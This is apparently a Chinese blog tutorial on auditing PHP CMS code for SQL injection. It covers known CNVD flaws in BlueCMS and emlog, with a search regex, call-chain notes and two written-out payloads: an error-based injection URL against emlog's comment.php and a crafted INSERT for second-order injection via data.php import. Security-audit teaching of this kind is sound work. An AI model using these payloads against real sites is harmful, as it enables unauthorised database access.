0
点赞
收藏
分享

微信扫一扫

超强命令行解析工具Apache Commons CLI

闲云困兽 04-05 08:30 阅读 2

文章目录

前言

挖掘技巧:
-语句监控-数据库SQL监控排查可利用语句定向分析
-功能追踪-功能点文件SQL执行代码函数调用链追踪
-正则搜索-(update|select|insert|delete|).?where.=

如何快速的在多个文件代码里面找脆弱:
1、看文件路径
2、看代码里面的变量(可控)
3、看变量前后的过滤

1、Bluecms-CNVD-1Day-常规注入审计分析

正则搜索关键词-快速定位漏洞点

(update|select|insert|delete|).*?where.*=

在这里插入图片描述
正则-ad_js.php->getone()->无过滤->有输出payload注入
在这里插入图片描述
在这里插入图片描述
Poc:

在这里插入图片描述
在这里插入图片描述

2、emlog-CNVD-1Day-常规注入审计分析

功能追踪-功能点文件SQL执行代码函数调用链追踪
审计流程:
comment.php->delCommentByIp($ip)->无过滤->构造触发
在这里插入图片描述
在这里插入图片描述

Poc:

/admin/comment.php?action=delbyip&ip=127.0.0.1%27and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%20--+&token=11f3f9cb7e78e3f88e39ea5678939b7d

在这里插入图片描述

3、emlog-CNVD-1Day-2次注入审计分析

语句监控-数据库SQL监控排查可利用语句定向分析

审计流程:

/admin/data.php
导入文件时执行SQL文件中语句,带入Payload

INSERT INTO emlog_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select version()),'writer','n','','123@qq.com ' , '','','0','1687261845','1687261845');
/admin/user.php

在这里插入图片描述
在这里插入图片描述

select查询nickname条件数据,访问触发二次注入
在这里插入图片描述

举报

相关推荐

0 条评论